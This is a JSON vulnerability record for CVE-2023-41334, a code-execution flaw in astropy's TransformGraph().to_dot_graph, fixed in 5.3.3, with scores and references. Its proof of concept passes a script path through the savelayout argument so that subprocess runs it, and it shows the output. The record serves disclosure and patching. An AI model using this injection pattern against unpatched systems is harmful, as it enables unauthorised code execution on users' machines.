{"id":"CVE-2023-41334","aliases":["GHSA-h2x6-5jx5-46hf","PYSEC-2026-1199"],"url":"https://o3.security/vulnerability/CVE-2023-41334","summary":"astropy vulnerable to RCE in TranformGraph().to_dot_graph function","details":"### Summary\nRCE due to improper input validation in TranformGraph().to_dot_graph function\n\n### Details\n\nDue to improper input validation a malicious user can provide a command or a script file as a value to `savelayout` argument, which will be placed as the first value in a list of arguments passed to `subprocess.Popen`. \nhttps://github.com/astropy/astropy/blob/9b97d98802ee4f5350a62b681c35d8687ee81d91/astropy/coordinates/transformations.py#L539\nAlthough an error will be raised, the command or script will be executed successfully.\n\n### PoC\n\n```shell\n$ cat /tmp/script\n#!/bin/bash\necho astrorce > /tmp/poc.txt\n```\n```shell\n$ python3\nPython 3.9.2 (default, Feb 28 2021, 17:03:44) \n[GCC 10.2.1 20210110] on linux\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> from astropy.coordinates.transformations import TransformGraph\n>>> tg = TransformGraph()\n>>> tg.to_dot_graph(savefn=\"/tmp/1.txt\", savelayout=\"/tmp/script\")\nTraceback (most recent call last):\n  File \"<stdin>\", line 1, in <module>\n  File \"/home/u32i/.local/lib/python3.9/site-packages/astropy/coordinates/transformations.py\", line 584, in to_dot_graph\n    stdout, stderr = proc.communicate(dotgraph)\n  File \"/usr/lib/python3.9/subprocess.py\", line 1134, in communicate\n    stdout, stderr = self._communicate(input, endtime, timeout)\n  File \"/usr/lib/python3.9/subprocess.py\", line 1961, in _communicate\n    input_view = memoryview(self._input)\nTypeError: memoryview: a bytes-like object is required, not 'str'\n>>> \n```\n```shell\n$ cat /tmp/poc.txt\nastrorce\n```\n\n### Impact\ncode execution on the user's machine\n","published":"2024-03-18T18:48:14.795Z","modified":"2026-08-12T03:51:22.339137122Z","cvss":{"score":8.4,"severity":"HIGH","vector":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},"epss":{"score":0.01124,"percentile":0.63334,"asOf":"2026-08-12"},"cisaKev":null,"exploitsKnown":0,"affectedPackages":[{"ecosystem":"PyPI","name":"astropy","fixedVersion":"5.3.3"}],"fix":{"url":"https://github.com/astropy/astropy/commit/22057d37b1313f5f5a9b5783df0a091d978dccb5","label":"astropy/astropy@22057d3"},"references":[{"type":"WEB","url":"https://github.com/astropy/astropy/blob/9b97d98802ee4f5350a62b681c35d8687ee81d91/astropy/coordinates/transformations.py#L539"},{"type":"ADVISORY","url":"https://github.com/CVEProject/cvelistV5/tree/main/cves/2023/41xxx/CVE-2023-41334.json"},{"type":"ADVISORY","url":"https://github.com/astropy/astropy/security/advisories/GHSA-h2x6-5jx5-46hf"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-41334"},{"type":"FIX","url":"https://github.com/astropy/astropy/commit/22057d37b1313f5f5a9b5783df0a091d978dccb5"},{"type":"PACKAGE","url":"https://github.com/astropy/astropy"}],"provenance":{"sources":["OSV.dev","FIRST.org (EPSS)"],"lastVerified":"2026-08-12T03:51:22.339137122Z"}}